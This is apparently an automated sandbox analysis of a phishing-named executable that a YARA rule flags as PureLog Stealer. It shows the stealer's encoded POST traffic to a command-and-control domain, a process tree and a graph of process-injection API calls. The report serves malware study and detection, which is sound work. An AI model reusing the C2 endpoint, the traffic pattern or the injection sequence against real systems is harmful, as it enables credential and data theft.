                                                                                                      Oct 22, 2024 09:07:58.726604939 CEST488INData Raw: 7d 2b 2b 66 2c 2b 2b 68 7d 72 65 74 75 72 6e 20 79 2e 6a 6f 69 6e 28 22 22 29 7d 2c 74 68 69 73 2e 54 6f 41 53 43 49 49 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 66 6f 72 28 76 61 72 20 72 3d 6f 2e 73 70 6c 69 74 28 22 2e 22 29 2c 65 3d 5b 5d 2c 6e
                                                                                                      Data Ascii: }++f,++h}return y.join("")},this.ToASCII=function(o){for(var r=o.split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/[^A-Za-z0-9-]/)?"xn--"+punycode.encode(t):t)}return e.join(".")},this.ToUnicode=function(o){for(var r=o.split("."),


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      53192.168.2.450060188.114.96.3805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:08:03.872876883 CEST730OUTPOST /3p0l/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.timizoasisey.shop
                                                                                                      Origin: http://www.timizoasisey.shop
                                                                                                      Referer: http://www.timizoasisey.shop/3p0l/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Raw: 5f 58 50 44 39 30 45 3d 31 4c 62 49 35 6a 46 49 6c 5a 70 73 44 57 47 51 2b 48 39 32 67 69 55 78 41 33 73 35 35 58 71 2f 45 6f 49 69 4b 71 56 46 71 49 4b 5a 70 31 68 4a 7a 36 62 5a 46 69 73 4c 37 56 37 72 44 64 4c 50 74 47 39 35 76 78 5a 6e 31 65 50 33 2b 6a 76 66 58 6b 47 77 43 30 35 37 73 4f 38 67 62 32 72 77 70 5a 6e 6e 6e 57 6a 68 6b 51 50 79 2b 42 53 73 30 4e 32 6f 4f 6c 6f 68 57 4f 79 76 4a 69 47 73 6c 57 77 4e 35 56 4a 47 35 64 2f 6f 79 4f 74 6e 56 52 51 54 49 6c 7a 36 39 48 45 31 55 48 38 43 62 61 37 48 64 4a 61 36 59 36 51 4b 45 63 61 5a 65 72 59 6b 69 6a 6d 30 75 6e 77 51 65 61 4e 4b 4c 77 3d 3d
                                                                                                      Data Ascii: _XPD90E=1LbI5jFIlZpsDWGQ+H92giUxA3s55Xq/EoIiKqVFqIKZp1hJz6bZFisL7V7rDdLPtG95vxZn1eP3+jvfXkGwC057sO8gb2rwpZnnnWjhkQPy+BSs0N2oOlohWOyvJiGslWwN5VJG5d/oyOtnVRQTIlz69HE1UH8Cba7HdJa6Y6QKEcaZerYkijm0unwQeaNKLw==
                                                                                                      Oct 22, 2024 09:08:04.948767900 CEST1056INHTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 22 Oct 2024 07:08:04 GMT
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qxe%2F10JfOoGGwnXQ19PXDAGVUEVm5cBOD6Ls3e%2BooDz2AQt72o6MN%2F1ob2m4tZMrp2ghE%2FEMzQ0yaRW5IhawKz5vZg2b5iZzbi1g7JXuKbQhEDw363ehQl8s%2BjX2SBbRLaz9%2FgslMmY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d67a76f797e6b7c-DFW
                                                                                                      Content-Encoding: gzip
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=979&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=730&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                      Data Raw: 66 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: f5Tn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(Y<;0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      54192.168.2.450061188.114.96.3805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:08:06.419856071 CEST750OUTPOST /3p0l/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.timizoasisey.shop
                                                                                                      Origin: http://www.timizoasisey.shop
                                                                                                      Referer: http://www.timizoasisey.shop/3p0l/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Raw: 5f 58 50 44 39 30 45 3d 31 4c 62 49 35 6a 46 49 6c 5a 70 73 53 46 4f 51 35 67 4a 32 77 79 55 32 45 48 73 35 79 33 71 7a 45 6f 55 69 4b 6f 35 56 71 2b 53 5a 71 52 74 4a 77 2b 76 5a 4c 43 73 4c 75 6c 37 75 64 74 4c 36 74 47 35 66 76 30 35 6e 31 65 62 33 2b 69 66 66 55 58 65 7a 43 6b 35 35 67 75 38 75 47 47 72 77 70 5a 6e 6e 6e 57 32 32 6b 51 58 79 2b 77 69 73 30 73 32 72 44 46 6f 6d 52 4f 79 76 4e 69 47 67 6c 57 77 37 35 58 78 34 35 66 48 6f 79 4d 31 6e 56 6b 38 51 44 6c 7a 38 35 48 45 6b 45 48 78 53 62 36 69 73 64 59 4f 67 56 49 59 39 49 36 58 44 50 61 35 7a 77 6a 43 48 7a 67 35 6b 54 5a 77 44 51 39 32 51 70 69 51 2b 48 75 6a 74 4a 79 30 79 30 32 45 39 45 67 34 3d
                                                                                                      Data Ascii: _XPD90E=1LbI5jFIlZpsSFOQ5gJ2wyU2EHs5y3qzEoUiKo5Vq+SZqRtJw+vZLCsLul7udtL6tG5fv05n1eb3+iffUXezCk55gu8uGGrwpZnnnW22kQXy+wis0s2rDFomROyvNiGglWw75Xx45fHoyM1nVk8QDlz85HEkEHxSb6isdYOgVIY9I6XDPa5zwjCHzg5kTZwDQ92QpiQ+HujtJy0y02E9Eg4=
                                                                                                      Oct 22, 2024 09:08:07.286417961 CEST1067INHTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 22 Oct 2024 07:08:07 GMT
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FMM6sQvfXcj%2B9BmkKTSFdZ7yx3VdOAg1RQLOrqQGmsBJujpvvq6UFreUwNkeEpDGdP29RLJIgLiC%2FZQNbTdCG1KQmmKCU%2F2wKkeawU27BN1TvHp8BDrCIUVt9fSiW%2BCCudcAzrT%2Bwi0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d67a77f7fb12e66-DFW
                                                                                                      Content-Encoding: gzip
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1322&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=750&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                      Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 65 62 0d 0a 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: febTn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(Y<;0


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      55192.168.2.450062188.114.96.380
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:08:09.578994036 CEST10832OUTPOST /3p0l/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 10304
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.timizoasisey.shop
                                                                                                      Origin: http://www.timizoasisey.shop
                                                                                                      Referer: http://www.timizoasisey.shop/3p0l/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Raw: 5f 58 50 44 39 30 45 3d 31 4c 62 49 35 6a 46 49 6c 5a 70 73 53 46 4f 51 35 67 4a 32 77 79 55 32 45 48 73 35 79 33 71 7a 45 6f 55 69 4b 6f 35 56 71 2b 71 5a 71 6b 78 4a 79 66 76 5a 4b 43 73 4c 79 31 37 76 64 74 4c 64 74 43 64 62 76 30 6c 4e 31 64 6a 33 2f 41 58 66 44 57 65 7a 4e 6b 35 35 39 2b 38 76 62 32 71 79 70 5a 32 67 6e 57 6d 32 6b 51 58 79 2b 7a 36 73 79 39 32 72 42 46 6f 68 57 4f 79 7a 4a 69 47 45 6c 57 6f 72 35 58 30 4e 35 73 50 6f 78 73 6c 6e 58 32 45 51 4f 6c 7a 2b 2b 48 46 35 45 48 38 49 62 36 2b 4b 64 59 36 65 56 4b 45 39 4c 65 32 6c 4e 71 78 48 79 77 79 6f 6f 6e 42 48 61 72 41 51 66 64 53 32 76 78 41 41 64 64 37 54 46 30 31 61 6d 6b 45 47 58 6e 31 71 68 4a 46 53 70 71 45 37 6f 64 4a 32 31 53 5a 61 70 72 6c 49 33 58 67 64 31 4b 7a 52 76 30 50 56 32 6b 51 35 6e 61 78 32 38 7a 68 57 39 47 6d 59 67 44 34 51 57 7a 56 71 33 47 71 45 79 46 6a 59 65 6f 54 69 75 35 59 4c 4b 6f 50 30 2b 74 61 68 69 64 50 41 58 31 62 65 6d 59 59 46 48 62 4e 5a 58 33 59 6e 34 36 58 7a 45 2f 52 77 72 4a 4f 50 63 42 [TRUNCATED]
                                                                                                      Data Ascii: _XPD90E=1LbI5jFIlZpsSFOQ5gJ2wyU2EHs5y3qzEoUiKo5Vq+qZqkxJyfvZKCsLy17vdtLdtCdbv0lN1dj3/AXfDWezNk559+8vb2qypZ2gnWm2kQXy+z6sy92rBFohWOyzJiGElWor5X0N5sPoxslnX2EQOlz++HF5EH8Ib6+KdY6eVKE9Le2lNqxHywyoonBHarAQfdS2vxAAdd7TF01amkEGXn1qhJFSpqE7odJ21SZaprlI3Xgd1KzRv0PV2kQ5nax28zhW9GmYgD4QWzVq3GqEyFjYeoTiu5YLKoP0+tahidPAX1bemYYFHbNZX3Yn46XzE/RwrJOPcBvY55Vx+/RyJZgbch+6ZVPVIK3cFJd5otzvtPFUTuQiOZtjw/14j+16OohBela/nFm2H+MU21dDUOTcopJulQ2FjNH3cRdTVR6hSJFkOUomhz8JWYEBPfOXrNYWhTpgEmXCq74ndZ1WeBkm0f2U6oXCGrReoR1aVd3CwHFfkJAlVSNB5Qiia6RshrlTuN9Lc71mNCi4HQf5NSLaFHdTd1M4298f9zVitwqZtRYZT94pIr5KohMHIeRqWFcZw4JbgmcA44QcW01gX8Hxt4YjJaw9P3CTMnvG2TR6A65TOo72p6AQO4943wTEhGl2QpfzEFl8DM9+XajFh8L/d12JPTJOs+TBbkR5MR73pkH8rx9H7n3wiQgJ+QeoR7a9VNXj5aEM0acFOMS1ASoShEEpajg4PZa64kwHAp//7/4Pni1+u5sHAQIPcln/Sudex10NL3UqZmqA5pIrz4yd4+mnDBCmDGxrHTiCfgzIyaZOx3ThkfHB9be2Ud73n59nmi1Zp2JIRn/rGJI80wyInMgFCIFtsMJzG4dGJ1E8R++jX9y7ZePMHL4SBlFGDbIy/EhIlfwDr9Kc3EY7Rvczpf5Hfpgpp1pnedcWo9YIa8nl6UYZR7nTmF5YZCia7pBstB5xwbuZKVmL+BB5OPggi1+Nj+fcxLzCJufHIWH+ [TRUNCATED]
                                                                                                      Oct 22, 2024 09:08:10.448340893 CEST1052INHTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 22 Oct 2024 07:08:10 GMT
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N%2FL46wwhSTWrH3QNUJLXHXLbAU5CvzW9KthIEa9MWQ0GE9JC6dqbO70UXYkVseSAa5KGUZsYPgtIADoRZtpL9gZmNzv18ZaIDm%2FG3xu5pgIpbTYMbZs5zXSeols4yIo4PFD2l09nPVI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d67a7932bee4870-DFW
                                                                                                      Content-Encoding: gzip
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1249&sent=3&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10832&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                      Data Raw: 66 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: f5Tn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(Y<;0


                                                                                                      Click to jump to process

                                                                                                      Click to jump to process

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Click to jump to process

                                                                                                      Target ID:0
                                                                                                      Start time:03:04:02
                                                                                                      Start date:22/10/2024
                                                                                                      Path:C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe"
                                                                                                      Imagebase:0xba0000
                                                                                                      File size:762'880 bytes
                                                                                                      MD5 hash:1FCDE6F41117BDC978A69990608ECC69
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1781279015.0000000005930000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1770346968.0000000004139000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:2
                                                                                                      Start time:03:04:09
                                                                                                      Start date:22/10/2024
                                                                                                      Path:C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe"
                                                                                                      Imagebase:0xbd0000
                                                                                                      File size:762'880 bytes
                                                                                                      MD5 hash:1FCDE6F41117BDC978A69990608ECC69
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:4
                                                                                                      Start time:03:04:20
                                                                                                      Start date:22/10/2024
                                                                                                      Path:C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe"
                                                                                                      Imagebase:0xf0000
                                                                                                      File size:140'800 bytes
                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      Target ID:7
                                                                                                      Start time:03:04:23
                                                                                                      Start date:22/10/2024
                                                                                                      Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\SysWOW64\colorcpl.exe"
                                                                                                      Imagebase:0x230000
                                                                                                      File size:86'528 bytes
                                                                                                      MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:false

                                                                                                      Target ID:8
                                                                                                      Start time:03:04:49
                                                                                                      Start date:22/10/2024
                                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                      Imagebase:0x7ff6bf500000
                                                                                                      File size:676'768 bytes
                                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Reset < >

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:8.7%
                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:124
                                                                                                        Total number of Limit Nodes:9
                                                                                                        execution_graph 30538 7b30912 30539 7b30b40 30538->30539 30543 766ef20 30539->30543 30547 766ef19 30539->30547 30540 7b30b5b 30544 766ef65 Wow64SetThreadContext 30543->30544 30546 766efad 30544->30546 30546->30540 30548 766ef20 Wow64SetThreadContext 30547->30548 30550 766efad 30548->30550 30550->30540 30439 7b300f1 30443 7b300e4 30439->30443 30440 7b30c9a 30441 7b30133 30442 7b30170 30441->30442 30446 766f0b0 WriteProcessMemory 30441->30446 30447 766f0b8 WriteProcessMemory 30441->30447 30443->30440 30448 766f336 30443->30448 30452 766f340 30443->30452 30446->30442 30447->30442 30449 766f340 CreateProcessA 30448->30449 30451 766f58b 30449->30451 30453 766f3c9 CreateProcessA 30452->30453 30455 766f58b 30453->30455 30456 7b30271 30457 7b30564 30456->30457 30465 766eff0 30457->30465 30469 766eff8 30457->30469 30458 7b30582 30460 7b308df 30458->30460 30473 766f0b0 30458->30473 30477 766f0b8 30458->30477 30459 7b306fd 30466 766eff8 VirtualAllocEx 30465->30466 30468 766f075 30466->30468 30468->30458 30470 766f038 VirtualAllocEx 30469->30470 30472 766f075 30470->30472 30472->30458 30474 766f0b8 WriteProcessMemory 30473->30474 30476 766f157 30474->30476 30476->30459 30478 766f100 WriteProcessMemory 30477->30478 30480 766f157 30478->30480 30480->30459 30551 7b30f40 30552 7b310cb 30551->30552 30553 7b30f66 30551->30553 30553->30552 30556 7b311c0 PostMessageW 30553->30556 30558 7b311b9 30553->30558 30557 7b3122c 30556->30557 30557->30553 30559 7b311c0 PostMessageW 30558->30559 30560 7b3122c 30559->30560 30560->30553 30505 7b30526 30509 766f1a0 30505->30509 30513 766f1a8 30505->30513 30506 7b30548 30510 766f1f3 ReadProcessMemory 30509->30510 30512 766f237 30510->30512 30512->30506 30514 766f1f3 ReadProcessMemory 30513->30514 30516 766f237 30514->30516 30516->30506 30561 2f7d701 30562 2f7d6c4 DuplicateHandle 30561->30562 30564 2f7d70a 30561->30564 30563 2f7d6d6 30562->30563 30481 2f7ac70 30485 2f7ad57 30481->30485 30490 2f7ad68 30481->30490 30482 2f7ac7f 30486 2f7ad9c 30485->30486 30487 2f7ad79 30485->30487 30486->30482 30487->30486 30488 2f7afa0 GetModuleHandleW 30487->30488 30489 2f7afcd 30488->30489 30489->30482 30491 2f7ad9c 30490->30491 30492 2f7ad79 30490->30492 30491->30482 30492->30491 30493 2f7afa0 GetModuleHandleW 30492->30493 30494 2f7afcd 30493->30494 30494->30482 30565 7b3050a 30566 7b30520 30565->30566 30573 766ee70 30566->30573 30577 766ee69 30566->30577 30567 7b309fb 30581 7b30ee7 30567->30581 30586 7b30ef8 30567->30586 30568 7b30a79 30574 766eeb0 ResumeThread 30573->30574 30576 766eee1 30574->30576 30576->30567 30578 766ee70 ResumeThread 30577->30578 30580 766eee1 30578->30580 30580->30567 30582 7b30f0d 30581->30582 30584 766ef20 Wow64SetThreadContext 30582->30584 30585 766ef19 Wow64SetThreadContext 30582->30585 30583 7b30f23 30583->30568 30584->30583 30585->30583 30587 7b30f0d 30586->30587 30589 766ef20 Wow64SetThreadContext 30587->30589 30590 766ef19 Wow64SetThreadContext 30587->30590 30588 7b30f23 30588->30568 30589->30588 30590->30588 30591 7b302ca 30592 7b301fa 30591->30592 30598 766f0b0 WriteProcessMemory 30592->30598 30599 766f0b8 WriteProcessMemory 30592->30599 30593 7b3015e 30594 7b30170 30593->30594 30596 766f0b0 WriteProcessMemory 30593->30596 30597 766f0b8 WriteProcessMemory 30593->30597 30595 7b302ab 30596->30595 30597->30595 30598->30593 30599->30593 30495 2f7d3f8 30496 2f7d43e GetCurrentProcess 30495->30496 30498 2f7d490 GetCurrentThread 30496->30498 30499 2f7d489 30496->30499 30500 2f7d4c6 30498->30500 30501 2f7d4cd GetCurrentProcess 30498->30501 30499->30498 30500->30501 30504 2f7d503 30501->30504 30502 2f7d52b GetCurrentThreadId 30503 2f7d55c 30502->30503 30504->30502 30517 2f74668 30518 2f7467a 30517->30518 30519 2f74686 30518->30519 30521 2f74779 30518->30521 30522 2f7479d 30521->30522 30526 2f74888 30522->30526 30530 2f74878 30522->30530 30528 2f748af 30526->30528 30527 2f7498c 30528->30527 30534 2f744e0 30528->30534 30532 2f74882 30530->30532 30531 2f7498c 30532->30531 30533 2f744e0 CreateActCtxA 30532->30533 30533->30531 30535 2f75918 CreateActCtxA 30534->30535 30537 2f759db 30535->30537

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 294 7660040-7660061 295 7660063 294->295 296 7660068-7660154 294->296 295->296 298 766015a-76602a5 296->298 299 7660979-76609a1 296->299 343 7660946-7660976 298->343 344 76602ab-7660306 298->344 302 7661070-7661079 299->302 304 76609af-76609b8 302->304 305 766107f-7661096 302->305 306 76609bf-7660a96 304->306 307 76609ba 304->307 465 7660a9c call 7661448 306->465 466 7660a9c call 7661438 306->466 307->306 324 7660aa2-7660aaf 326 7660ab1-7660abd 324->326 327 7660ad9 324->327 328 7660ac7-7660acd 326->328 329 7660abf-7660ac5 326->329 330 7660adf-7660aff 327->330 331 7660ad7 328->331 329->331 335 7660b01-7660b58 330->335 336 7660b5d-7660bd5 330->336 331->330 349 766106d 335->349 355 7660bd7-7660c28 336->355 356 7660c2a-7660c6d 336->356 343->299 352 766030b-7660316 344->352 353 7660308 344->353 349->302 354 766085a-7660860 352->354 353->352 358 7660866-76608e3 354->358 359 766031b-7660339 354->359 382 7660c78-7660c7e 355->382 356->382 399 7660930-7660936 358->399 361 7660390-76603a5 359->361 362 766033b-766033f 359->362 366 76603a7 361->366 367 76603ac-76603c2 361->367 362->361 365 7660341-766034c 362->365 369 7660382-7660388 365->369 366->367 371 76603c4 367->371 372 76603c9-76603e0 367->372 376 766034e-7660352 369->376 377 766038a-766038b 369->377 371->372 374 76603e7-76603fd 372->374 375 76603e2 372->375 380 7660404-766040b 374->380 381 76603ff 374->381 375->374 378 7660354 376->378 379 7660358-7660370 376->379 383 766040e-766047f 377->383 378->379 386 7660377-766037f 379->386 387 7660372 379->387 380->383 381->380 388 7660cd3-7660cdf 382->388 389 7660495-766060d 383->389 390 7660481 383->390 386->369 387->386 392 7660c80-7660ca2 388->392 393 7660ce1-7660d67 388->393 400 7660623-766075e 389->400 401 766060f 389->401 390->389 391 7660483-766048f 390->391 391->389 395 7660ca4 392->395 396 7660ca9-7660cd0 392->396 422 7660ee6-7660eef 393->422 395->396 396->388 403 76608e5-766092d 399->403 404 7660938-766093e 399->404 412 76607c2-76607d7 400->412 413 7660760-7660764 400->413 401->400 405 7660611-766061d 401->405 403->399 404->343 405->400 415 76607de-76607ff 412->415 416 76607d9 412->416 413->412 417 7660766-7660775 413->417 419 7660806-7660825 415->419 420 7660801 415->420 416->415 421 76607b4-76607ba 417->421 426 7660827 419->426 427 766082c-766084c 419->427 420->419 428 7660777-766077b 421->428 429 76607bc-76607bd 421->429 424 7660ef5-7660f50 422->424 425 7660d6c-7660d81 422->425 451 7660f87-7660fb1 424->451 452 7660f52-7660f85 424->452 432 7660d83 425->432 433 7660d8a-7660ed4 425->433 